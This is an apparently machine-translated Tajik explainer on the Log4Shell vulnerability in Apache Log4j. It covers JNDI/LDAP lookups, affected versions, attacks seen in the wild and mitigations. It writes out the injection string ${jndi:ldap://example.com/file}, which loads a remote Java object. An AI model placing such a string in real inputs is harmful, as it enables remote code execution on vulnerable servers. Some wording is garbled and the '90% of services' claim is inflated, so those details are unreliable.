Мундариҷа[Пинҳон кардан][Намоиш]
Дар охири моҳи ноябри соли 2021 мо як таҳдиди бузургро ба киберамният ошкор кардем. Ин истисмор эҳтимолан ба миллионҳо системаҳои компютерӣ дар саросари ҷаҳон таъсир мерасонад.
Ин дастур оид ба осебпазирии Log4j ва чӣ гуна камбудии тарҳрезии нодида гирифташуда зиёда аз 90% хидматҳои компютерии ҷаҳонро барои ҳамла боз кардааст.
Apache Log4j як барномаи кушодаи бақайдгирии Java мебошад, ки аз ҷониби Фонди нармафзори Apache таҳия шудааст. Аслан аз ҷониби Ceki Gülcü дар соли 2001 навишта шуда буд, ҳоло он қисми таркибии Apache Logging Services, як лоиҳаи Фонди нармафзори Apache мебошад.
Ширкатҳо дар саросари ҷаҳон китобхонаи Log4j-ро барои фаъол кардани сабти барномаҳояшон истифода мебаранд. Дарвоқеъ, китобхонаи Java хеле ҳама ҷост, шумо метавонед онро дар барномаҳои Amazon, Microsoft, Google ва ғайра пайдо кунед.
Шӯҳрати китобхона маънои онро дорад, ки ҳама гуна камбудиҳои эҳтимолии код метавонад миллионҳо компютерҳоро барои ҳакерӣ боз кунад. 24 ноябри соли 2021, А амнияти абр муҳаққиқе, ки дар Alibaba кор мекунад, як камбудии даҳшатнокро кашф кард.
Осебпазирии Log4j, ки бо номи Log4Shell низ маълум аст, аз соли 2013 ноаён вуҷуд дошт. Осебият ба фаъолони зараровар имкон дод, ки кодро дар системаҳои зарардида, ки Log4j кор мекунанд, иҷро кунанд. Он 9 декабри соли 2021 ба таври оммавӣ ошкор карда шуд
Коршиносони соҳа камбудии Log4Shell-ро меноманд бузургтарин осебпазирӣ дар хотираи охир.
Дар як ҳафтаи пас аз нашри осебпазирӣ, гурӯҳҳои киберамният миллионҳо ҳамларо ошкор карданд. Баъзе тадқиқотчиён ҳатто суръати беш аз сад ҳамларо дар як дақиқа мушоҳида карданд.
Чӣ тавр он кор мекунад?
Барои фаҳмидани он ки чаро Log4Shell ин қадар хатарнок аст, мо бояд фаҳмем, ки он ба чӣ қодир аст.
Осебпазирии Log4Shell барои иҷрои худсаронаи код имкон медиҳад, ки аслан маънои онро дорад, ки ҳамлакунанда метавонад ҳама гуна фармон ё кодро дар мошини мавриди ҳадаф иҷро кунад.
Инро чӣ тавр иҷро мекунад?
Аввалан, мо бояд фаҳмем, ки JNDI чист.
Интерфейси Java номгузорӣ ва директория (JNDI) як хидмати Java мебошад, ки ба барномаҳои Java имкон медиҳад, ки тавассути ном маълумот ва захираҳоро кашф ва ҷустуҷӯ кунанд. Ин хидматҳои феҳрист муҳиманд, зеро онҳо маҷмӯи муташаккили сабтҳоро барои таҳиягарон пешниҳод мекунанд, то ҳангоми сохтани барномаҳо ба осонӣ истинод кунанд.
JNDI метавонад протоколҳои гуногунро барои дастрасӣ ба феҳристи муайян истифода барад. Яке аз ин протоколҳо Протоколи Access Directory Lightweight, ё LDAP мебошад.
Ҳангоми сабти сатр, log4j ҳангоми дучор шудан бо ифодаҳои форма ивазкунии сатрро иҷро мекунад ${prefix:name}
.
Барои намуна, Text: ${java:version}
метавонад ҳамчун матн сабт карда шавад: версияи Java 1.8.0_65. Ин гуна ивазкуниҳо маъмуланд.
Мо инчунин метавонем ифодаҳоеро дошта бошем, ба монанди Text: ${jndi:ldap://example.com/file}
ки системаи JNDI-ро барои бор кардани объекти Java аз URL тавассути протоколи LDAP истифода мебарад.
Ин ба таври муассир маълумотеро, ки аз он URL меояд, ба мошин бор мекунад. Ҳар як ҳакери эҳтимолӣ метавонад рамзи зарароварро дар URL-и умумӣ ҷойгир кунад ва интизор шавад, ки мошинҳо бо истифода аз Log4j сабти ном шаванд.
Азбаски мундариҷаи паёмҳои гузориш дорои маълумоти аз ҷониби корбар назоратшаванда, ҳакерҳо метавонанд истинодҳои JNDI-и худро, ки ба серверҳои LDAP, ки онҳо назорат мекунанд, ворид кунанд. Ин серверҳои LDAP метавонанд пур аз объектҳои зараровари Java бошанд, ки JNDI метавонад тавассути осебпазирӣ иҷро кунад.
Он чизе, ки инро бадтар мекунад, он аст, ки он муҳим нест, ки барнома аз ҷониби сервер ё барномаи муштарӣ бошад.
То он даме, ки барои логгер роҳи хондани рамзи зараровари ҳамлакунанда мавҷуд аст, барнома то ҳол барои истисмор боз аст.
Кист?
Ин осебпазирӣ ба ҳама системаҳо ва хидматҳое таъсир мерасонад, ки APAche Log4j-ро бо версияҳои 2.0 то 2.14.1 истифода мебаранд.
Якчанд коршиносони амниятӣ маслиҳат медиҳанд, ки осебпазирӣ метавонад ба як қатор замимаҳо бо истифода аз Java таъсир расонад.
Камбудӣ бори аввал дар бозии видеоии Minecraft, ки ба Microsoft тааллуқ дорад, ошкор шуд. Microsoft аз корбарони худ даъват кард, ки нармафзори версияи Java-и Minecraft-ро навсозӣ кунанд, то ҳар гуна хатарро пешгирӣ кунанд.
Ҷен Истерли, Директори Агентии Амнияти Киберамният ва Инфрасохтор (CISA) мегӯяд, ки фурӯшандагон дорои масъулияти калон барои пешгирӣ кардани корбарони ниҳоӣ аз фаъолони бадхоҳ, ки аз ин осебпазирӣ истифода мебаранд.
"Фурӯшандагон инчунин бояд бо муштариёни худ муошират кунанд, то корбарони ниҳоӣ бидонанд, ки маҳсулоти онҳо ин осебпазириро дар бар мегирад ва бояд навсозиҳои нармафзорро авлавият диҳанд."
Гуфта мешавад, ки ҳамлаҳо аллакай оғоз шудаанд. Ширкати Symantec, ки нармафзори киберамниятро таъмин мекунад, шумораи гуногуни дархостҳои ҳамларо мушоҳида кардааст.
Инҳоянд чанд намунаи намудҳои ҳамлаҳое, ки муҳаққиқон ошкор кардаанд:
- бот-
Ботнетҳо як шабакаи компютерҳое мебошанд, ки таҳти назорати як тарафи ҳамла қарор доранд. Онҳо барои анҷом додани ҳамлаҳои DDoS, дуздидани маълумот ва дигар қаллобӣ кӯмак мекунанд. Муҳаққиқон ботнети Muhstik-ро дар скриптҳои shell, ки аз истисмори Log4j бор карда шудаанд, мушоҳида карданд.
- XMRig Miner Троян
XMRig як конкани кушодаи cryptocurrency аст, ки CPU-ҳоро барои истихроҷи аломати Monero истифода мебарад. Киберҷинояткорон метавонанд XMRig-ро дар дастгоҳҳои одамон насб кунанд, то онҳо тавонанд қудрати коркарди худро бидуни огоҳии худ истифода баранд.
- Khonsari Ransomware
Ransomware ба як намуди нармафзори зараровар ишора мекунад, ки барои он тарҳрезӣ шудааст файлҳоро рамзгузорӣ кунед дар компютер. Сипас ҳамлагарон метавонанд бар ивази бозпас додани дастрасӣ ба файлҳои рамзгузоришуда пардохт талаб кунанд. Муҳаққиқон дар ҳамлаҳои Log4Shell барномаи ransomware Khonsari-ро кашф карданд. Онҳо серверҳои Windows-ро ҳадаф қарор медиҳанд ва чаҳорчӯбаи .NET-ро истифода мебаранд.
Баъд чӣ мешавад?
Коршиносон пешгӯӣ мекунанд, ки барои пурра ислоҳ кардани бесарусомоние, ки осебпазирии Log4J ба вуҷуд омадааст, метавонад моҳҳо ё ҳатто солҳоро талаб кунад.
Ин раванд навсозии ҳар як системаи зарардидаро бо версияи часпак дарбар мегирад. Ҳатто агар ҳамаи ин системаҳо часпонида шуда бошанд ҳам, ҳанӯз ҳам таҳдиди дарҳои эҳтимолӣ вуҷуд дорад, ки ҳакерҳо аллакай ба тирезае, ки серверҳо барои ҳамла кушода буданд, илова кардаанд.
бисёр ҳалли ва коҳиш додани таъсири вуҷуд доранд, то аз истифодаи ин хатогиҳо истифода нашаванд. Версияи нави Log4j 2.15.0-rc1 барои кам кардани ин осебпазирӣ танзимоти гуногунро тағир дод.
Ҳама хусусиятҳое, ки JNDI-ро истифода мебаранд, бо нобаёнӣ хомӯш карда мешаванд ва ҷустуҷӯҳои дурдаст низ маҳдуд карда шудаанд. Хомӯш кардани хусусияти ҷустуҷӯ дар танзимоти Log4j-и шумо барои коҳиш додани хатари истисморҳои эҳтимолӣ кӯмак хоҳад кард.
Берун аз Log4j, ҳанӯз ҳам зарурати нақшаи васеътари пешгирии истисморҳои кушодаасос вуҷуд дорад.
Аввали моҳи май Кохи Сафед як хабарро нашр карда буд фармоиш ки максад аз он бехтар намудани амнияти кибер-миллй мебошад. Он муқарраротро дар бораи векселҳои маводҳои нармафзор (SBOM) дар бар мегирад, ки аслан як ҳуҷҷати расмӣ буд, ки рӯйхати ҳар як ҷузъе, ки барои сохтани барнома лозим аст, иборат буд.
Ин қисмҳоро дар бар мегирад, ба монанди манбаи кушода бастаҳо, вобастагӣ ва APIҳо, ки барои таҳия истифода мешаванд. Гарчанде ки идеяи SBOMs барои шаффофият муфид аст, оё он воқеан ба истеъмолкунанда кӯмак мекунад?
Такмил додани вобастагӣ метавонад душвории аз ҳад зиёд бошад. Ширкатҳо метавонанд танҳо пардохти ҳар гуна ҷаримаро интихоб кунанд, ба ҷои он ки хавфи беҳуда сарф кардани вақти иловагӣ барои дарёфти бастаҳои алтернативӣ. Эҳтимол, ин SBOM-ҳо танҳо дар сурате муфид хоҳанд буд, ки онҳо миқёс боз маҳдуд аст.
хулоса
Масъалаи Log4j барои ташкилотхо на танхо як проблемаи техникй мебошад.
Роҳбарони тиҷорат бояд аз хатарҳои эҳтимолӣ огоҳ бошанд, ки вақте серверҳо, маҳсулот ё хидматҳои онҳо ба коде такя мекунанд, ки худашон нигоҳ намедоранд.
Такя ба замимаҳои кушодаасос ва шахсони сеюм ҳамеша бо миқдори муайяни хатар меояд. Ширкатҳо бояд пеш аз ошкор шудани таҳдидҳои нав таҳияи стратегияҳои коҳиш додани хатарро баррасӣ кунанд.
Аксарияти веб ба нармафзори кушодаасос такя мекунанд, ки аз ҷониби ҳазорон ихтиёриён дар саросари ҷаҳон нигоҳ дошта мешаванд.
Агар мо хоҳем, ки вебро ҷои амн нигоҳ дорем, ҳукуматҳо ва корпоратсияҳо бояд барои маблағгузории кӯшишҳои кушодаасос ва агентиҳои киберамният, ба монанди ИДМ.
Дин ва мазҳаб